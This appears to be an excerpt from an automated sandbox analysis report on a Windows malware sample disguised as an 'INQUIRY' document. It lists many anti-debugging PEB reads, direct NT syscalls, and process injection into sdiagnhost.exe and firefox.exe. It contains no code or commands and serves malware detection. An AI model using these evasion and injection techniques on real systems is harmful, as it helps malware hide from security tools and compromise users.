Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019B245A mov eax, dword ptr fs:[00000030h] 0_2_019B245A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A1C460 mov ecx, dword ptr fs:[00000030h] 0_2_01A1C460
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0198645D mov eax, dword ptr fs:[00000030h] 0_2_0198645D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CE443 mov eax, dword ptr fs:[00000030h] 0_2_019CE443
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CE443 mov eax, dword ptr fs:[00000030h] 0_2_019CE443
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CE443 mov eax, dword ptr fs:[00000030h] 0_2_019CE443
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CE443 mov eax, dword ptr fs:[00000030h] 0_2_019CE443
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CE443 mov eax, dword ptr fs:[00000030h] 0_2_019CE443
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CE443 mov eax, dword ptr fs:[00000030h] 0_2_019CE443
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CE443 mov eax, dword ptr fs:[00000030h] 0_2_019CE443
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CE443 mov eax, dword ptr fs:[00000030h] 0_2_019CE443
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019BA470 mov eax, dword ptr fs:[00000030h] 0_2_019BA470
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019BA470 mov eax, dword ptr fs:[00000030h] 0_2_019BA470
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019BA470 mov eax, dword ptr fs:[00000030h] 0_2_019BA470
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A4A456 mov eax, dword ptr fs:[00000030h] 0_2_01A4A456
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A447A0 mov eax, dword ptr fs:[00000030h] 0_2_01A447A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A3678E mov eax, dword ptr fs:[00000030h] 0_2_01A3678E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019907AF mov eax, dword ptr fs:[00000030h] 0_2_019907AF
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A1E7E1 mov eax, dword ptr fs:[00000030h] 0_2_01A1E7E1
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0199C7C0 mov eax, dword ptr fs:[00000030h] 0_2_0199C7C0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A107C3 mov eax, dword ptr fs:[00000030h] 0_2_01A107C3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019947FB mov eax, dword ptr fs:[00000030h] 0_2_019947FB
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019947FB mov eax, dword ptr fs:[00000030h] 0_2_019947FB
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019B27ED mov eax, dword ptr fs:[00000030h] 0_2_019B27ED
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019B27ED mov eax, dword ptr fs:[00000030h] 0_2_019B27ED
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019B27ED mov eax, dword ptr fs:[00000030h] 0_2_019B27ED
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01990710 mov eax, dword ptr fs:[00000030h] 0_2_01990710
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C0710 mov eax, dword ptr fs:[00000030h] 0_2_019C0710
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A0C730 mov eax, dword ptr fs:[00000030h] 0_2_01A0C730
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CC700 mov eax, dword ptr fs:[00000030h] 0_2_019CC700
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C273C mov eax, dword ptr fs:[00000030h] 0_2_019C273C
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C273C mov ecx, dword ptr fs:[00000030h] 0_2_019C273C
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C273C mov eax, dword ptr fs:[00000030h] 0_2_019C273C
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CC720 mov eax, dword ptr fs:[00000030h] 0_2_019CC720
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CC720 mov eax, dword ptr fs:[00000030h] 0_2_019CC720
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01990750 mov eax, dword ptr fs:[00000030h] 0_2_01990750
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2750 mov eax, dword ptr fs:[00000030h] 0_2_019D2750
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2750 mov eax, dword ptr fs:[00000030h] 0_2_019D2750
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C674D mov esi, dword ptr fs:[00000030h] 0_2_019C674D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C674D mov eax, dword ptr fs:[00000030h] 0_2_019C674D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C674D mov eax, dword ptr fs:[00000030h] 0_2_019C674D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01998770 mov eax, dword ptr fs:[00000030h] 0_2_01998770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h] 0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h] 0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h] 0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h] 0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h] 0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h] 0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h] 0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h] 0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h] 0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h] 0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h] 0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h] 0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A14755 mov eax, dword ptr fs:[00000030h] 0_2_01A14755
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A1E75D mov eax, dword ptr fs:[00000030h] 0_2_01A1E75D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01994690 mov eax, dword ptr fs:[00000030h] 0_2_01994690
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01994690 mov eax, dword ptr fs:[00000030h] 0_2_01994690
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C66B0 mov eax, dword ptr fs:[00000030h] 0_2_019C66B0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CC6A6 mov eax, dword ptr fs:[00000030h] 0_2_019CC6A6
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A106F1 mov eax, dword ptr fs:[00000030h] 0_2_01A106F1
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A106F1 mov eax, dword ptr fs:[00000030h] 0_2_01A106F1
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A0E6F2 mov eax, dword ptr fs:[00000030h] 0_2_01A0E6F2
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A0E6F2 mov eax, dword ptr fs:[00000030h] 0_2_01A0E6F2
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A0E6F2 mov eax, dword ptr fs:[00000030h] 0_2_01A0E6F2
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A0E6F2 mov eax, dword ptr fs:[00000030h] 0_2_01A0E6F2
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CA6C7 mov ebx, dword ptr fs:[00000030h] 0_2_019CA6C7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CA6C7 mov eax, dword ptr fs:[00000030h] 0_2_019CA6C7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2619 mov eax, dword ptr fs:[00000030h] 0_2_019D2619
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A260B mov eax, dword ptr fs:[00000030h] 0_2_019A260B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A260B mov eax, dword ptr fs:[00000030h] 0_2_019A260B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A260B mov eax, dword ptr fs:[00000030h] 0_2_019A260B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A260B mov eax, dword ptr fs:[00000030h] 0_2_019A260B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A260B mov eax, dword ptr fs:[00000030h] 0_2_019A260B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A260B mov eax, dword ptr fs:[00000030h] 0_2_019A260B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A260B mov eax, dword ptr fs:[00000030h] 0_2_019A260B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A0E609 mov eax, dword ptr fs:[00000030h] 0_2_01A0E609
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0199262C mov eax, dword ptr fs:[00000030h] 0_2_0199262C
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C6620 mov eax, dword ptr fs:[00000030h] 0_2_019C6620
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C8620 mov eax, dword ptr fs:[00000030h] 0_2_019C8620
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019AE627 mov eax, dword ptr fs:[00000030h] 0_2_019AE627
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A5866E mov eax, dword ptr fs:[00000030h] 0_2_01A5866E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A5866E mov eax, dword ptr fs:[00000030h] 0_2_01A5866E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019AC640 mov eax, dword ptr fs:[00000030h] 0_2_019AC640
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C2674 mov eax, dword ptr fs:[00000030h] 0_2_019C2674
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CA660 mov eax, dword ptr fs:[00000030h] 0_2_019CA660
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CA660 mov eax, dword ptr fs:[00000030h] 0_2_019CA660
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A189B3 mov esi, dword ptr fs:[00000030h] 0_2_01A189B3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A189B3 mov eax, dword ptr fs:[00000030h] 0_2_01A189B3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A189B3 mov eax, dword ptr fs:[00000030h] 0_2_01A189B3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019909AD mov eax, dword ptr fs:[00000030h] 0_2_019909AD
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019909AD mov eax, dword ptr fs:[00000030h] 0_2_019909AD
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h] 0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h] 0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h] 0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h] 0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h] 0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h] 0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h] 0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h] 0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h] 0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h] 0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h] 0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h] 0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h] 0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A1E9E0 mov eax, dword ptr fs:[00000030h] 0_2_01A1E9E0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0199A9D0 mov eax, dword ptr fs:[00000030h] 0_2_0199A9D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0199A9D0 mov eax, dword ptr fs:[00000030h] 0_2_0199A9D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0199A9D0 mov eax, dword ptr fs:[00000030h] 0_2_0199A9D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0199A9D0 mov eax, dword ptr fs:[00000030h] 0_2_0199A9D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0199A9D0 mov eax, dword ptr fs:[00000030h] 0_2_0199A9D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0199A9D0 mov eax, dword ptr fs:[00000030h] 0_2_0199A9D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C49D0 mov eax, dword ptr fs:[00000030h] 0_2_019C49D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A269C0 mov eax, dword ptr fs:[00000030h] 0_2_01A269C0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C29F9 mov eax, dword ptr fs:[00000030h] 0_2_019C29F9
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C29F9 mov eax, dword ptr fs:[00000030h] 0_2_019C29F9
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A5A9D3 mov eax, dword ptr fs:[00000030h] 0_2_01A5A9D3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01988918 mov eax, dword ptr fs:[00000030h] 0_2_01988918
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01988918 mov eax, dword ptr fs:[00000030h] 0_2_01988918
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A2892B mov eax, dword ptr fs:[00000030h] 0_2_01A2892B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A1892A mov eax, dword ptr fs:[00000030h] 0_2_01A1892A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A0E908 mov eax, dword ptr fs:[00000030h] 0_2_01A0E908
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A0E908 mov eax, dword ptr fs:[00000030h] 0_2_01A0E908
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A1C912 mov eax, dword ptr fs:[00000030h] 0_2_01A1C912
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A34978 mov eax, dword ptr fs:[00000030h] 0_2_01A34978
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A34978 mov eax, dword ptr fs:[00000030h] 0_2_01A34978
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A1C97C mov eax, dword ptr fs:[00000030h] 0_2_01A1C97C
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A64940 mov eax, dword ptr fs:[00000030h] 0_2_01A64940
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A10946 mov eax, dword ptr fs:[00000030h] 0_2_01A10946
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D096E mov eax, dword ptr fs:[00000030h] 0_2_019D096E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D096E mov edx, dword ptr fs:[00000030h] 0_2_019D096E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D096E mov eax, dword ptr fs:[00000030h] 0_2_019D096E

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtCreateFile: Direct from: 0x77752FEC
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtOpenFile: Direct from: 0x77752DCC
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtSetInformationThread: Direct from: 0x777463F9
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtQueryInformationToken: Direct from: 0x77752CAC
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtTerminateThread: Direct from: 0x77752FCC
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtProtectVirtualMemory: Direct from: 0x77752F9C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtSetInformationProcess: Direct from: 0x77752C5C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtNotifyChangeKey: Direct from: 0x77753C2C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtOpenKeyEx: Direct from: 0x77752B9C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtOpenSection: Direct from: 0x77752E0C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtProtectVirtualMemory: Direct from: 0x77747B2E
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtAllocateVirtualMemory: Direct from: 0x777548EC
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtQueryVolumeInformationFile: Direct from: 0x77752F2C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtQuerySystemInformation: Direct from: 0x777548CC
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtAllocateVirtualMemory: Direct from: 0x77752BEC
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtDeviceIoControlFile: Direct from: 0x77752AEC
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtCreateUserProcess: Direct from: 0x7775371C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtWriteVirtualMemory: Direct from: 0x7775490C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtQueryInformationProcess: Direct from: 0x77752C26
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtResumeThread: Direct from: 0x77752FBC
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtReadVirtualMemory: Direct from: 0x77752E8C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtCreateKey: Direct from: 0x77752C6C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtSetInformationThread: Direct from: 0x77752B4C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtQueryAttributesFile: Direct from: 0x77752E6C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtAllocateVirtualMemory: Direct from: 0x77753C9C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtClose: Direct from: 0x77752B6C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtUnmapViewOfSection: Direct from: 0x77752D3C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtCreateMutant: Direct from: 0x777535CC
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtWriteVirtualMemory: Direct from: 0x77752E3C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtMapViewOfSection: Direct from: 0x77752D1C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtResumeThread: Direct from: 0x777536AC
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtReadFile: Direct from: 0x77752ADC
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtQuerySystemInformation: Direct from: 0x77752DFC
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtDelayExecution: Direct from: 0x77752DDC
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe NtAllocateVirtualMemory: Direct from: 0x77752BFC
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Section loaded: NULL target: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe protection: execute and read and write
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Section loaded: NULL target: C:\Windows\SysWOW64\sdiagnhost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: NULL target: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe protection: read write
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: NULL target: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\sdiagnhost.exe Thread register set: target process: 5928
Source: C:\Windows\SysWOW64\sdiagnhost.exe Thread APC queued: target process: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe Process created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"
Source: C:\Windows\SysWOW64\sdiagnhost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
